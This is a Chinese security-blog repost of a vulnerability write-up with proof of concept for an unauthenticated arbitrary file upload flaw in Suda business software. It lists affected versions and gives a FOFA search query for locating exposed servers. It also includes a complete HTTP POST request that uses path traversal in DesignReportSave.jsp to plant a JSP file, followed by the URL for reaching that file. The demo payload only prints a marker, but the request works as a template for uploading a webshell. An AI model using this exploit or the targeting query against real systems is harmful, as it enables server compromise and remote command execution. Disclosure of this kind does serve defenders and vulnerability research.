速达软件全系产品存在任意文件上传漏洞 附POC

admin 2023年12月4日08:48:53评论160 views字数 1394阅读4分38秒阅读模式

速达软件全系产品存在任意文件上传漏洞 附POC

免责声明:请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

1. 速达软件全系产品简介

微信公众号搜索:南风漏洞复现文库 该文章 南风漏洞复现文库 公众号首发

速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。

2.漏洞描述

速达软件专注中小企业管理软件,产品涵盖进销存软件,财务软件,ERP软件,CRM系统,项目管理软件,OA系统,仓库管理软件等,是中小企业管理市场的佼佼者,提供产品、技术、服务等信息,百万企业共同选择。速达软件全系产品存在任意文件上传漏洞,未经身份认证得攻击者可以通过此漏洞上传恶意后门文件,执行任意指令,造成服务器失陷.

CVE编号:

CNNVD编号:

CNVD编号:

3.影响版本

速达A3.cloud BAS、速达A3.cloud STD、速达A30.cloud PRO、速达3000.online PRO、速达A4.cloud BAS、速达A4.cloud STD、速达A40.cloud PRO、速达4000.online PRO、速达A5.cloud STD、速达A50.cloud PRO、速达A70.cloud PRO、速达5000.online PRO、速达7000.online PRO

速达软件全系产品存在任意文件上传漏洞 附POC
速达软件全系产品存在任意文件上传漏洞

4.fofa查询语句

app="速达软件-公司产品"

5.漏洞复现

漏洞链接:http://127.0.0.1/report/DesignReportSave.jsp?report=../625248.jsp

漏洞数据包:

POST /report/DesignReportSave.jsp?report=../625248.jsp HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:120.0) Gecko/20100101 Firefox/120.0
Accept-Encoding: gzip, deflate
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Connection: close
Host: 127.0.0.1
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Upgrade-Insecure-Requests: 1
Content-Type: application/octet-stream
Content-Length: 28

<% out.print("984969719");%>

速达软件全系产品存在任意文件上传漏洞 附POC

拼接上传路径:http://127.0.0.1/625248.jsp

速达软件全系产品存在任意文件上传漏洞 附POC

7.整改意见

请联系厂商获取修复方案:http://www.superdata.com.cn/

原文始发于微信公众号(南风漏洞复现文库):速达软件全系产品存在任意文件上传漏洞 附POC

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年12月4日08:48:53
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   速达软件全系产品存在任意文件上传漏洞 附POChttps://cn-sec.com/archives/2265302.html

发表评论

匿名网友 填写信息